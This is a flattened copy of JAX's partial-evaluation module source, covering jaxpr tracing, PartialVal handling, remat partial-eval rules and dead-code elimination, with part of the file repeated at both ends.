PartialVal for the outputs. The intermediate values that depend only on known inputs and are needed to compute the output of `jaxpr` are in `consts` and are passed in as the constvars of the `jaxpr`. The handling of the known outputs depends on `instantiate`. For example, given `fun` defined as follows:: def fun(ki, ui): # ki will be a known input in this example ka = ki + 2 kb = ka + 3 return (kb, ui + ka) with `ki` the known PartialVal `1.`, and `ui` an unknown PartialVal. The only computation that depends on unknown inputs is `ui + ka` and will be the only computation in the body of the `jaxpr`. This computation depends on the known intermediate value `ka`, which will be computed statically. Currently, such constants are either embedded in the Jaxpr if they are scalars, or passed as a constvar to `jaxpr`, and then the value of the actual constant will be in `consts`: When `instantiate=False` we get:: jaxpr = { lambda ka ; ki ui. let c = add ui ka in (*, c) } # known outputs are `*` out_pvals = [known(6), unknown(ShapedArray)] # the known outputs are known PartialVal consts = [3] # the constant for `ka` When `instantiate=True` we get:: jaxpr = { lambda ka kb ; ki ui. let c = add ui ka in (kb, c) } # known output are explicit out_pvals = [abstract(ConcreteArray(6)), abstract(ShapedArray)] # all are unknown PartialVal consts = [3, 6] # values for `ka` and `kb` constvars """ trace_type = trace_type or (StagingJaxprTrace if stage_out else JaxprTrace) with new_master(trace_type, bottom=bottom) as master: fun = trace_to_subjaxpr(fun, master, instantiate) jaxpr, (out_pvals, consts, env) = fun.call_wrapped(pvals) assert not env del master return jaxpr, out_pvals, consts @lu.transformation def trace_to_subjaxpr(master: core.MasterTrace, instantiate: Union[bool, Sequence[bool]], pvals: Sequence[PartialVal]): assert all([isinstance(pv, PartialVal) for pv in pvals]), pvals trace = JaxprTrace(master, core.cur_sublevel()) in_tracers = map(trace.new_arg, pvals) ans = yield in_tracers, {} instantiate = [instantiate] * len(ans) if isinstance(instantiate, bool) else instantiate out_tracers = map(trace.full_raise, map(core.full_lower, ans)) out_tracers = map(partial(instantiate_const_at, trace), instantiate, out_tracers) jaxpr, consts, env = tracers_to_jaxpr(in_tracers, out_tracers) out_pvals = [t.pval for t in out_tracers] del trace, in_tracers, out_tracers yield jaxpr, (out_pvals, consts, env) def instantiate_const_at(trace, instantiate: bool, tracer): if instantiate: return trace.instantiate_const(trace.full_raise(tracer)) else: return tracer FreeVar = namedtuple('FreeVar', ['val']) ConstVar = namedtuple('ConstVar', ['val']) LambdaBinding = namedtuple('LambdaBinding', []) JaxprEqnRecipe = namedtuple('JaxprEqnRecipe', ['eqn_id', 'invars', 'outvars', 'primitive', 'params']) def new_eqn_recipe(invars, outvars, primitive, params): """Constructs a new JaxEqnRecipe. Params: invars: the tracers for the primitive inputs. outvars: the tracers for the primitive outputs. primitive: the primitive. params: the primitive params """ # TODO(necula): move these checks to core.check_jaxpr, and call in more places if primitive.call_primitive or primitive.map_primitive: assert "call_jaxpr" in params if primitive.map_primitive: assert "mapped_invars" in params return JaxprEqnRecipe(object(), tuple(invars), map(ref, outvars), primitive, params) def recipe_to_eqn(unused_var, getvar, recipe): _, in_tracers, out_tracer_refs, primitive, params = recipe out_tracers = [t_ref() for t_ref in out_tracer_refs] invars = [getvar(t) for t in in_tracers] outvars = [unused_var() if t is None else getvar(t) for t in out_tracers] return new_jaxpr_eqn(invars, outvars, primitive, params) def tracers_to_jaxpr(in_tracers, out_tracers): """Constructs Jaxpr given tracers for inputs and outputs. Params: in_tracers: the tracers that were created for the function inputs out_tracers: the tracers that were output by the function. Returns: a triple of a `Jaxpr`, a list of constant values corresponding to the `constvars` in the returned Jaxps, and a list of environment values. The vars for the environment values have been prepended to the Jaxpr's `invars`. """ newvar = core.gensym('') t_to_var = {} def getvar(t): var = t_to_var.get(id(t)) if var is None: aval = t.pval.get_aval() if not t.pval.is_known() else abstract_unit var = t_to_var[id(t)] = newvar(aval) return var sorted_tracers = toposort(out_tracers) invars = map(getvar, in_tracers) eqns = [] env = {} consts = {} const_to_var = {} def getconstvar(c): var = const_to_var.get(id(c)) if var is None: var = const_to_var[id(c)] = newvar(get_aval(c)) return var processed_eqn_ids = set() for t in sorted_tracers: recipe = t.recipe if isinstance(recipe, JaxprEqnRecipe): if recipe.eqn_id not in processed_eqn_ids: eqns.append(recipe_to_eqn(lambda: newvar(core.abstract_unit), getvar, recipe)) processed_eqn_ids.add(recipe.eqn_id) elif isinstance(recipe, LambdaBinding): if not any(t is in_tracer for in_tracer in in_tracers): raise core.escaped_tracer_error( "Tracer not among input tracers {}".format(t)) assert in_tracers, "Lambda binding with no args" elif isinstance(recipe, FreeVar): env[getvar(t)] = recipe.val elif isinstance(recipe, ConstVar): v = t_to_var[id(t)] = getconstvar(recipe.val) consts[v] = recipe.val elif isinstance(recipe, Literal): t_to_var[id(t)] = recipe elif recipe is unit: t_to_var[id(t)] = unitvar else: raise TypeError(recipe) env_vars, env_vals = unzip2(env.items()) const_vars, const_vals = unzip2(consts.items()) # The env_vars are pre-pended to the invars jaxpr = Jaxpr(const_vars, list(it.chain(env_vars, invars)), list(map(getvar, out_tracers)), eqns) core.skip_checks or core.check_jaxpr(jaxpr) return jaxpr, const_vals, env_vals @cache() def convert_constvars_jaxpr(jaxpr): """Moves the constvars to the start of invars.""" core.skip_checks or core.check_jaxpr(jaxpr) lifted_jaxpr = Jaxpr(constvars=(), invars=jaxpr.constvars + jaxpr.invars, outvars=jaxpr.outvars, eqns=jaxpr.eqns) core.skip_checks or core.check_jaxpr(lifted_jaxpr) return lifted_jaxpr def partial_eval_jaxpr(jaxpr: TypedJaxpr, unknowns: Sequence[bool], instantiate: Union[bool, Sequence[bool]], trace_type: Optional[Type[core.Trace]] ) -> Tuple[TypedJaxpr, TypedJaxpr, Sequence[bool]]: """Specializes a Jaxpr given an indication of which inputs are known. Returns: (jaxpr_known, jaxpr_unknown, out_unknowns). `out_unknowns` specifies which outputs are unknown (depend on some unknown inputs). `jaxpr_known` takes the same inputs as `jaxpr`, ignores the unknown inputs, and performs *all* the computation in `jaxpr` that depends only on the known inputs. Outputs correspond to those of `jaxpr`, with the unknown ones replaced with `*`, appended with the known residuals (the intermediate computations in `jaxpr` that depend only on known inputs and that are needed to compute the unknown outputs). `jaxpr_unknown` takes the same inputs as `jaxpr` along with the known residuals computed by `jaxpr_known` and returns the same outputs as `jaxpr` with the known outputs replaced by `*`. Roughly, `jaxpr(ki, ui)` is decomposed assuming `ki` and `ui` are the known and respectively unknown inputs into: jaxpr(ki, ui) = let kout, _, kresidual = jaxpr_known(kin, *) let _, uout = jaxpr_unknown(ki, ui, kresidual) in (kout, uout) For example, if `jaxpr` is lambda ki, ui: let ka = ki + 2 in (ki + 3, ui + ka)" then `jaxpr_known` = lambda ki, ui: let ka = ki + 2 in (ki + 3, *, ka) 'jaxpr_unknown` = lambda ki, ui, ka: (*, ui + ka) """ f = lu.wrap_init(core.jaxpr_as_fun(jaxpr)) cell = [] def fun(*vals): pvals = [PartialVal.unknown(aval) if uk else PartialVal.known(val) for aval, val, uk in zip(jaxpr.in_avals, vals, unknowns)] jaxpr_2, out_pvals_2, consts_2 = trace_to_jaxpr(f, pvals, instantiate=instantiate, trace_type=trace_type) out_pvs_2, out_consts_2 = unzip2(out_pvals_2) cell.append((out_pvs_2, jaxpr_2, len(consts_2))) return out_consts_2 + consts_2 # For jaxpr_known we pass core.unit for the unknown inputs, and known PartialVal for the # known inputs. pvals = [PartialVal.unknown(abstract_unit) if uk else PartialVal.unknown(aval) for aval, uk in zip(jaxpr.in_avals, unknowns)] jaxpr_1, out_pvals, consts_1 = trace_to_jaxpr(lu.wrap_init(fun), pvals, instantiate=True) (out_pvs_2, jaxpr_2, num_res), = cell assert len(jaxpr_2.constvars) == num_res # jaxpr :: a -> b # jaxpr_1 :: a1 -> [b1, res] # jaxpr_2 :: res | a2 -> b2 # jaxpr_2 :: [a2, res] -> b2 jaxpr_2 = convert_constvars_jaxpr(jaxpr_2) jaxpr_2.invars = jaxpr_2.invars[num_res:] + jaxpr_2.invars[:num_res] for var, unknown in zip(jaxpr_2.invars[:len(unknowns)], unknowns): if not unknown: var.aval = abstract_unit uk_out = [pv is not None for pv in out_pvs_2] in_avals_1, in_avals_2 = unzip2(map(_split_aval, unknowns, jaxpr.in_avals)) out_avals_1, out_avals_2 = unzip2(map(_split_aval, uk_out, jaxpr.out_avals)) # out_avals_1 and in_avals_2 need the residuals added out_pvs, _ = unzip2(out_pvals) res_avals = out_pvs[len(jaxpr.out_avals):] assert len(res_avals) == num_res out_avals_1 = out_avals_1 + res_avals in_avals_2 = in_avals_2 + res_avals typed_jaxpr_1 = TypedJaxpr(jaxpr_1, consts_1, in_avals_1, out_avals_1) typed_jaxpr_2 = TypedJaxpr(jaxpr_2, (), in_avals_2, out_avals_2) return typed_jaxpr_1, typed_jaxpr_2, uk_out def _split_aval(unknown, aval): return (abstract_unit, aval) if unknown else (aval, abstract_unit) remat_call_p = core.Primitive('remat_call') remat_call_p.call_primitive = True remat_call = partial(core.call_bind, remat_call_p) remat_call_p.def_custom_bind(remat_call) remat_call_p.def_impl(core.call_impl) remat_call_p.multiple_results = True def _remat_partial_eval(trace, _, f, tracers, params): concrete = params['concrete'] # Unlike JaxprTrace.process_call, we want to form a jaxpr for the entirety of # the function being called, not just for the unknown parts. To do that, we # instantiate all the input tracers as constants in the jaxpr being formed. # Those tracers might have concrete avals, and doing abstract interpretation # on concrete avals engenders a tradeoff: it allows data-dependent Python # control flow to work, but it can in some cases lead to redundant FLOPs (done # both in the `bind` call below and the `core.jaxpr_as_fun` call). We use the # `concrete` parameter to switch this behavior, and if `concrete` is False # then we raise the avals to the Shaped level. if concrete: instantiated_tracers = map(trace.instantiate_const, tracers) else: instantiated_tracers = map(trace.instantiate_const_abstracted, tracers) # Using the instantiated tracers, run call_bind like JaxprTrace.process_call. in_pvs, in_consts = unzip2(t.pval for t in instantiated_tracers) fun, aux = partial_eval(f, trace, in_pvs) with core.initial_style_staging(): out_flat = remat_call_p.bind(fun, *in_consts, **params) out_pvs, jaxpr, env = aux() env = map(trace.full_raise, env) out_pval_consts1, consts = split_list(out_flat, [len(out_flat)-len(jaxpr.constvars)]) out_pvals1 = [PartialVal((pv, const)) for pv, const in zip(out_pvs, out_pval_consts1)] # Since we traced with everything marked as unknown, but we need to know which # outputs are known/unknown, we use partial_eval_jaxpr to get out_unknowns. in_avals = ([raise_to_shaped(t.pval.get_aval()) for t in env] + [raise_to_shaped(pv) for pv in in_pvs]) out_avals = [raise_to_shaped(pv if pv is not None else abstract_unit if var is unitvar else get_aval(var.val) if type(var) is Literal else get_aval(const)) for var, pv, const in zip(jaxpr.outvars, out_pvs, out_pval_consts1)] typed_jaxpr = core.TypedJaxpr(jaxpr, consts, in_avals, out_avals) in_unknowns = [t.pval[0] is not None for t in it.chain(env, tracers)] jaxpr_1, jaxpr_2, out_unknowns = partial_eval_jaxpr(typed_jaxpr, in_unknowns, instantiate=False, trace_type=trace.master.trace_type) num_res = len(jaxpr_1.out_avals) - len(jaxpr_2.out_avals) # First, we prune the jaxpr to be staged out not to have too many outputs. typed_jaxpr = _dce_jaxpr(typed_jaxpr, out_unknowns) # Next, we need values for the outputs that should be known. Since consts # weren't passed through Python for evaluation, we need to evaluate jaxpr_1, # minus the residual outputs that we don't need. When `concrete=True`, as an # optimization we can avoid redoing *some* redundant FLOPs, namely those that # produced concrete avals at the output, simply by using those as computed # values. For the use case of reverse-mode ad in op-by-op ("eager mode") # evaluation, all the primal outputs should be concrete (thus not recomputed). to_compute = [not uk and type(pv) is not ConcreteArray for uk, pv in zip(out_unknowns, out_pvs)] jaxpr_1_primals = _dce_jaxpr(jaxpr_1, to_compute + [False] * num_res) _, in_consts = unzip2(t.pval for t in it.chain(env, tracers)) out_pval_consts2 = core.jaxpr_as_fun(jaxpr_1_primals)(*in_consts)[:-num_res or None] out_pvals = map(_reconstruct_pval, out_pvals1, out_pval_consts2, out_unknowns) # Now that we have out_pvals, the rest is just like JaxprTrace.process_call. instantiated_tracers = env + instantiated_tracers const_tracers = map(trace.new_instantiated_const, consts) lifted_jaxpr = convert_constvars_jaxpr(typed_jaxpr.jaxpr) out_tracers = [JaxprTracer(trace, out_pval, None) for out_pval in out_pvals] new_params = dict(params, call_jaxpr=lifted_jaxpr) eqn = new_eqn_recipe(tuple(it.chain(const_tracers, instantiated_tracers)), out_tracers, remat_call_p, new_params) for t in out_tracers: t.recipe = eqn return out_tracers call_partial_eval_rules[remat_call_p] = _remat_partial_eval def _dce_jaxpr(typed_jaxpr, outputs): # This dead-code elimination is pretty rudimentary, and in particular doesn't # nontrivially DCE through scan, call, or other higher-order primitives. # TODO(mattjj): better DCE jaxpr = typed_jaxpr.jaxpr outvars, out_avals = jaxpr.outvars, typed_jaxpr.out_avals out_pairs = [(var, aval) if output else (unitvar, core.abstract_unit) for var, aval, output in zip(outvars, out_avals, outputs)] new_outvars, new_out_avals = unzip2(out_pairs) needed_vars = {v for v in new_outvars if type(v) is not Literal} new_eqns = [] for eqn in jaxpr.eqns[::-1]: if set(eqn.outvars) & needed_vars: new_eqns.append(eqn) needed_vars.update(v for v in eqn.invars if type(v) is not Literal) new_eqns = new_eqns[::-1] new_jaxpr = core.Jaxpr(jaxpr.constvars, jaxpr.invars, new_outvars, new_eqns) return core.TypedJaxpr(new_jaxpr, typed_jaxpr.literals, typed_jaxpr.in_avals, new_out_avals) def _reconstruct_pval(pval1: PartialVal, const2: core.Value, unknown: bool): pv1, _ = pval1 if unknown or pval1.is_known(): return pval1 else: if type(pv1) is ConcreteArray: return PartialVal.known(pv1.val) else: return PartialVal.known(const2) def move_binders_to_front(typed_jaxpr: TypedJaxpr, to_move: Sequence[bool]) -> TypedJaxpr: """Reorder the `invars` to move to front the ones for which `to_move` is True.""" assert not typed_jaxpr.jaxpr.constvars assert len(typed_jaxpr.in_avals) == len(to_move) new_invars = _move_to_front(typed_jaxpr.jaxpr.invars, to_move) new_jaxpr = core.Jaxpr((), new_invars, typed_jaxpr.jaxpr.outvars, typed_jaxpr.jaxpr.eqns) new_in_avals = _move_to_front(typed_jaxpr.in_avals, to_move) new_typed_jaxpr = core.TypedJaxpr(new_jaxpr, typed_jaxpr.literals, new_in_avals, typed_jaxpr.out_avals) return new_typed_jaxpr def _move_to_front(lst: Sequence, to_move: Sequence[bool]) -> Sequence: return ([elt for elt, move in zip(lst, to_move) if move] + [elt for elt, move in zip(lst, to_move) if not move])
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import itertools as it from collections import namedtuple import contextlib import threading from typing import Callable, Dict, Optional, Sequence, Set, Tuple, Type, Union from weakref import ref import numpy as onp from .. import core from .. import linear_util as lu from ..abstract_arrays import ShapedArray, ConcreteArray, raise_to_shaped from ..ad_util import zero from ..util import (unzip2, safe_zip, safe_map, toposort, partial, split_list, wrap_name, cache) from ..core import (Trace, Tracer, new_master, Jaxpr, Literal, get_aval, AbstractValue, unit, unitvar, abstract_unit, TypedJaxpr, new_jaxpr_eqn) map = safe_map zip = safe_zip def identity(x): return x class PartialVal(tuple): """Partial value: either a known value or an unknown (abstract) value. Represented as a pair `(aval_opt, const)` of one of two kinds: * `(None, <Constant>)` indicates a known value, either a Python regular value, or a Tracer. * `(<AbstractValue>, *)` indicates an unknown value characterized by an abstract value. """ def __new__(cls, xs: Tuple[Optional[AbstractValue], core.Value]): pv, const = xs if not core.skip_checks: # type checks assert isinstance(pv, (AbstractValue, type(None))), xs assert isinstance(const, core.Tracer) or const is zero or core.valid_jaxtype(const), xs # invariant checks if isinstance(pv, AbstractValue): assert const == core.unit, xs return tuple.__new__(cls, xs) @classmethod def known(cls, const: core.Value) -> 'PartialVal': return PartialVal((None, const)) @classmethod def unknown(cls, aval: AbstractValue) -> 'PartialVal': return PartialVal((aval, core.unit)) def is_known(self): return self[0] is None def get_known(self) -> Optional[core.Value]: """Get the known value, if known, else None.""" return self[1] if self[0] is None else None def get_aval(self) -> AbstractValue: """Get the AbstractValue either directly for unknown values, or from the known constant.""" known = self.get_known() if known is not None: return get_aval(known) else: return self[0] def merge_with_known(self, val: core.Value) -> core.Value: """Either the stored known value, or the given 'val'.""" known = self.get_known() return known if known is not None else val # We form Jaxprs using `JaxprTrace` for three distinct purposes: # (1) to stage program representations completely out of the JAX system # (e.g. for XLA using jit or pmap). In this case we are using the # `StagingJaxprTrace` subclass. # (3) to linearize a function for reverse-mode AD. In this case we are # using the `JaxprTrace` subclass. # (2) to build a representation of a function that may require further JAX # transformations (e.g. in "initial-style" higher-order primitives, like # for control flow). In this case we use the `JaxprTrace` class. class JaxprTrace(Trace): def pure(self, val): return self.new_const(val) def lift(self, val): return self.new_const(val) def sublift(self, val): return JaxprTracer(self, val.pval, FreeVar(val)) def new_const(self, val): if isinstance(val, Tracer) and val._trace.level == self.level: raise Exception return JaxprTracer(self, PartialVal.known(val), unit) def new_instantiated_literal(self, val): return JaxprTracer(self, PartialVal.unknown(get_aval(val)), Literal(val)) def new_instantiated_const(self, val): return JaxprTracer(self, PartialVal.unknown(get_aval(val)), ConstVar(val)) def new_arg(self, pval: PartialVal): return JaxprTracer(self, pval, LambdaBinding()) def instantiate_const(self, tracer): const = tracer.pval.get_known() if const is None: return tracer else: if type(const) in core.literalable_types and onp.shape(const) == (): return self.new_instantiated_literal(const) else: return self.new_instantiated_const(const) def instantiate_const_abstracted(self, tracer): const = tracer.pval.get_known() if const is None: return tracer else: aval = raise_to_shaped(get_aval(const), onp.isscalar(const)) return JaxprTracer(self, PartialVal.unknown(aval), ConstVar(const)) def process_primitive(self, primitive, tracers, params): if primitive in custom_partial_eval_rules: return custom_partial_eval_rules[primitive](self, *tracers, **params) else: return self.default_process_primitive(primitive, tracers, params) def default_process_primitive(self, primitive, tracers, params): """By default, if all the input tracers are known, then execute the primitive and all the ouputs are known. Otherwise, all the outputs are unknown.""" consts = tuple(t.pval.get_known() for t in tracers) if all(c is not None for c in consts): return primitive.bind(*consts, **params) tracers = map(self.instantiate_const, tracers) avals = [t.aval for t in tracers] out_aval = primitive.abstract_eval(*avals, **params) if primitive.multiple_results: out_tracers = [JaxprTracer(self, PartialVal.unknown(aval), None) for aval in out_aval] eqn = new_eqn_recipe(tracers, out_tracers, primitive, params) for t in out_tracers: t.recipe = eqn return out_tracers else: out_tracer = JaxprTracer(self, PartialVal.unknown(out_aval), None) out_tracer.recipe = new_eqn_recipe(tracers, [out_tracer], primitive, params) return out_tracer def process_call(self, call_primitive, f: lu.WrappedFun, tracers, params): name = params.get('name', f.__name__) if (self.master.trace_type is StagingJaxprTrace and call_primitive in staged_out_calls): tracers = map(self.instantiate_const_abstracted, tracers) else: name = wrap_name(name, 'pe') params = dict(params, name=name) if call_primitive in call_partial_eval_rules: return call_partial_eval_rules[call_primitive](self, call_primitive, f, tracers, params) in_pvs, in_consts = unzip2([t.pval for t in tracers]) fun, aux = partial_eval(f, self, in_pvs) out_flat = call_primitive.bind(fun, *in_consts, **params) out_pvs, jaxpr, env = aux() env_tracers = map(self.full_raise, env) out_pv_consts, consts = split_list(out_flat, [len(out_flat)-len(jaxpr.constvars)]) if not jaxpr.eqns: env = {core.unitvar: core.unit} map(env.setdefault, jaxpr.invars, (*env_tracers, *tracers)) map(env.setdefault, jaxpr.constvars, consts) return [pv_const if pv is None else v.val if type(v) is Literal else env[v] for v, pv, pv_const in zip(jaxpr.outvars, out_pvs, out_pv_consts)] const_tracers = map(self.new_instantiated_const, consts) lifted_jaxpr = convert_constvars_jaxpr(jaxpr) out_tracers = [JaxprTracer(self, PartialVal((out_pv, out_pv_const)), None) for out_pv, out_pv_const in zip(out_pvs, out_pv_consts)] new_params = dict(params, call_jaxpr=lifted_jaxpr) # The `jaxpr` already contains the env_vars at start of invars eqn = new_eqn_recipe(tuple(it.chain(const_tracers, env_tracers, tracers)), out_tracers, call_primitive, new_params) for t in out_tracers: t.recipe = eqn return out_tracers def post_process_call(self, call_primitive, out_tracers, params): jaxpr, consts, env = tracers_to_jaxpr([], out_tracers) out_pvs, out_pv_consts = unzip2(t.pval for t in out_tracers) out = out_pv_consts + consts del consts, out_pv_consts master = self.master def todo(x): n = len(jaxpr.outvars) out_pv_consts, consts = x[:n], x[n:] trace = JaxprTrace(master, core.cur_sublevel()) const_tracers = map(trace.new_instantiated_const, consts) env_tracers = map(trace.full_raise, env) lifted_jaxpr = convert_constvars_jaxpr(jaxpr) out_tracers = [JaxprTracer(trace, PartialVal((out_pv, out_pv_const)), None) for out_pv, out_pv_const in zip(out_pvs, out_pv_consts)] new_params = dict(params, call_jaxpr=lifted_jaxpr) # The `jaxpr` already contains the env_vars at start of invars eqn = new_eqn_recipe(tuple(it.chain(const_tracers, env_tracers)), out_tracers, call_primitive, new_params) for t in out_tracers: t.recipe = eqn return out_tracers return out, todo def process_map(self, map_primitive, f: lu.WrappedFun, tracers, params): name = params.get('name', f.__name__) if self.master.trace_type is StagingJaxprTrace: tracers = map(self.instantiate_const_abstracted, tracers) else: name = wrap_name(name, 'pe') params = dict(params, name=name) in_pvs, in_consts = unzip2([t.pval for t in tracers]) reduced_pvs = [None if pv is None else _mapped_aval(params['axis_size'], pv) if m else pv for pv, m in zip(in_pvs, params['mapped_invars'])] fun, aux = partial_eval(f, self, reduced_pvs) out_flat = map_primitive.bind(fun, *in_consts, **params) out_pvs_reduced, jaxpr, env = aux() out_pv_consts, consts = split_list(out_flat, [len(out_flat)-len(jaxpr.constvars)]) out_pvs = [None if pv is None else _unmapped_aval(params['axis_size'], pv) for pv in out_pvs_reduced] const_tracers = map(self.new_instantiated_const, consts) env_tracers = map(self.full_raise, env) lifted_jaxpr = convert_constvars_jaxpr(jaxpr) out_tracers = [JaxprTracer(self, PartialVal((out_pv, out_pv_const)), None) for out_pv, out_pv_const in zip(out_pvs, out_pv_consts)] # The `jaxpr` already contains the env_vars at start of invars new_params = dict(params, mapped_invars=((True,) * len(const_tracers) + (False,) * len(env_tracers) + params['mapped_invars']), call_jaxpr=lifted_jaxpr) assert (len(new_params['mapped_invars']) == len(const_tracers) + len(env_tracers) + len(tracers)) eqn = new_eqn_recipe(tuple(it.chain(const_tracers, env_tracers, tracers)), out_tracers, map_primitive, new_params) for t in out_tracers: t.recipe = eqn return out_tracers def post_process_map(self, map_primitive, out_tracers, params): jaxpr, consts, env = tracers_to_jaxpr([], out_tracers) out_pvs_reduced, out_pv_consts = unzip2(t.pval for t in out_tracers) out_pvs = [None if pv is None else _unmapped_aval(params['axis_size'], pv) for pv in out_pvs_reduced] out = out_pv_consts + consts del consts, out_pv_consts master = self.master def todo(x): n = len(jaxpr.outvars) out_pv_consts, consts = x[:n], x[n:] trace = JaxprTrace(master, core.cur_sublevel()) const_tracers = map(trace.new_instantiated_const, consts) # The `jaxpr` already contains the env_vars at start of invars lifted_jaxpr = convert_constvars_jaxpr(jaxpr) out_tracers = [JaxprTracer(trace, PartialVal((out_pv, out_pv_const)), None) for out_pv, out_pv_const in zip(out_pvs, out_pv_consts)] new_params = dict(params, mapped_invars=tuple([True] * len(const_tracers) + [False] * len(env)), call_jaxpr=lifted_jaxpr) env_tracers = map(trace.full_raise, env) eqn = new_eqn_recipe(it.chain(const_tracers, env_tracers), out_tracers, map_primitive, new_params) for t in out_tracers: t.recipe = eqn return out_tracers return out, todo def process_custom_jvp_call(self, prim, fun, jvp, tracers): # See comment at top of `JaxprTrace`. This method should be reachable # only when we stage out, and in that case we drop the custom differentiation # rules, because we do not need them. assert self.master.trace_type is StagingJaxprTrace return fun.call_wrapped(*tracers) def process_custom_vjp_call(self, prim, fun, fwd, bwd, tracers, out_trees): # See comment in the above process_custom_jvp_call method. assert self.master.trace_type is StagingJaxprTrace return fun.call_wrapped(*tracers) # This subclass is used just for its type tag (see comment for `JaxprTrace`) # This switches the behavior of process_call to stage out into the jaxpr any # call primitives encountered (rather than doing partial evaluation into the call). class StagingJaxprTrace(JaxprTrace): pass def _mapped_aval(size, aval): if aval is core.abstract_unit: return aval elif isinstance(aval, ShapedArray): # might be raising abstraction level from Concrete here assert aval.shape[0] == size return ShapedArray(aval.shape[1:], aval.dtype) else: raise TypeError(aval) def _unmapped_aval(size, aval): if aval is core.abstract_unit: return aval elif isinstance(aval, ShapedArray): return ShapedArray((size,) + aval.shape, aval.dtype) else: raise TypeError(aval) custom_partial_eval_rules: Dict[core.Primitive, Callable] = {} call_partial_eval_rules: Dict[core.Primitive, Callable] = {} staged_out_calls: Set[core.Primitive] = set() def partial_eval(f, trace, pvs: Sequence[Optional[AbstractValue]], instantiate=False): f = trace_to_subjaxpr(f, trace.master, instantiate) return partial_eval_wrapper(f, tuple(pvs)) @lu.transformation_with_aux def partial_eval_wrapper(avals: Sequence[Optional[AbstractValue]], *consts): py_args = (map(PartialVal, zip(avals, consts)),) jaxpr, (out_pvals, consts, env) = yield py_args, {} out_pvs, out_consts = unzip2(out_pvals) out = tuple(out_consts) + tuple(consts) # TODO: can consts be traced? yield out, (out_pvs, jaxpr, env) def abstract_eval_fun(fun, *avals, **params): pvals_in = [PartialVal.unknown(a) for a in avals] _, pvals_out, _ = trace_to_jaxpr(lu.wrap_init(fun, params), pvals_in, instantiate=True, stage_out=True) avals_out, _ = unzip2(pvals_out) for aval_out in avals_out: assert isinstance(aval_out, AbstractValue) # instantiate=True return avals_out class JaxprTracer(Tracer): __slots__ = ['pval', 'recipe'] def __init__(self, trace, pval: PartialVal, recipe): assert isinstance(pval, PartialVal) pv, const = pval if isinstance(const, Tracer) and const._trace.level >= trace.level: raise core.escaped_tracer_error( "Tracer from a higher level: {} in trace {}".format(const, trace)) self._trace = trace self.pval = pval self.recipe = recipe def __repr__(self): return 'Traced<{}:{}>'.format(self.aval, self._trace) @property def aval(self): return self.pval.get_aval() @property def parents(self): if isinstance(self.recipe, JaxprEqnRecipe): return self.recipe.invars else: return [] def full_lower(self): known = self.pval.get_known() if known is not None: return core.full_lower(known) else: return self # TODO(necula): this should return a TypedJaxpr # TODO(necula): remove stage_out, replace trace_type=pe.StagingJaxprTrace def trace_to_jaxpr(fun: lu.WrappedFun, pvals: Sequence[PartialVal], instantiate: Union[bool, Sequence[bool]] = False, stage_out=False, bottom=False, trace_type: Optional[Type[Trace]] = None) \ -> Tuple[Jaxpr, Tuple[PartialVal, ...], Tuple[core.Value, ...]]: """Traces a function into a Jaxpr, given PartialVals for inputs. `trace_type` can be one of `StagingJaxprTrace` or `JaxprTrace` (see comments for that class). Returns (`jaxpr`, `out_pvals`, `consts`). The `jaxpr` contains only the computation that depends on unknown inputs. The `out_pvals` are the PartialVal for the outputs. The intermediate values that depend only on known inputs and are needed to compute the output of `jaxpr` are in `consts` and are passed in as the constvars of the `jaxpr`. The handling of the known outputs depends on `instantiate`. For example, given `fun` defined as follows:: def fun(ki, ui): # ki will be a known input in this example ka = ki + 2 kb = ka + 3 return (kb, ui + ka) with `ki` the known PartialVal `1.`, and `ui` an unknown PartialVal. The only computation that depends on unknown inputs is `ui + ka` and will be the only computation in the body of the `jaxpr`. This computation depends on the known intermediate value `ka`, which will be computed statically. Currently, such constants are either embedded in the Jaxpr if they are scalars, or passed as a constvar to `jaxpr`, and then the value of the actual constant will be in `consts`: When `instantiate=False` we get:: jaxpr = { lambda ka ; ki ui. let c = add ui ka in (*, c) } # known outputs are `*` out_pvals = [known(6), unknown(ShapedArray)] # the known outputs are known PartialVal consts = [3] # the constant for `ka` When `instantiate=True` we get:: jaxpr = { lambda ka kb ; ki ui. let c = add ui ka in (kb, c) } # known output are explicit out_pvals = [abstract(ConcreteArray(6)), abstract(ShapedArray)] # all are unknown PartialVal consts = [3, 6] # values for `ka` and `kb` constvars """ trace_type = trace_type or (StagingJaxprTrace if stage_out else JaxprTrace) with new_master(trace_type, bottom=bottom) as master: fun = trace_to_subjaxpr(fun, master, instantiate) jaxpr, (out_pvals, consts, env) = fun.call_wrapped(pvals) assert not env del master return jaxpr, out_pvals, consts @lu.transformation def trace_to_subjaxpr(master: core.MasterTrace, instantiate: Union[bool, Sequence[bool]], pvals: Sequence[PartialVal]): assert all([isinstance(pv, PartialVal) for pv in pvals]), pvals trace = JaxprTrace(master, core.cur_sublevel()) in_tracers = map(trace.new_arg, pvals) ans = yield in_tracers, {} instantiate = [instantiate] * len(ans) if isinstance(instantiate, bool) else instantiate out_tracers = map(trace.full_raise, map(core.full_lower, ans)) out_tracers = map(partial(instantiate_const_at, trace), instantiate, out_tracers) jaxpr, consts, env = tracers_to_jaxpr(in_tracers, out_tracers) out_pvals = [t.pval for t in out_tracers] del trace, in_tracers, out_tracers yield jaxpr, (out_pvals, consts, env) def instantiate_const_at(trace, instantiate: bool, tracer): if instantiate: return trace.instantiate_const(trace.full_raise(tracer)) else: return tracer FreeVar = namedtuple('FreeVar', ['val']) ConstVar = namedtuple('ConstVar', ['val']) LambdaBinding = namedtuple('LambdaBinding', []) JaxprEqnRecipe = namedtuple('JaxprEqnRecipe', ['eqn_id', 'invars', 'outvars', 'primitive', 'params']) def new_eqn_recipe(invars, outvars, primitive, params): """Constructs a new JaxEqnRecipe. Params: invars: the tracers for the primitive inputs. outvars: the tracers for the primitive outputs. primitive: the primitive. params: the primitive params """ # TODO(necula): move these checks to core.check_jaxpr, and call in more places if primitive.call_primitive or primitive.map_primitive: assert "call_jaxpr" in params if primitive.map_primitive: assert "mapped_invars" in params return JaxprEqnRecipe(object(), tuple(invars), map(ref, outvars), primitive, params) def recipe_to_eqn(unused_var, getvar, recipe): _, in_tracers, out_tracer_refs, primitive, params = recipe out_tracers = [t_ref() for t_ref in out_tracer_refs] invars = [getvar(t) for t in in_tracers] outvars = [unused_var() if t is 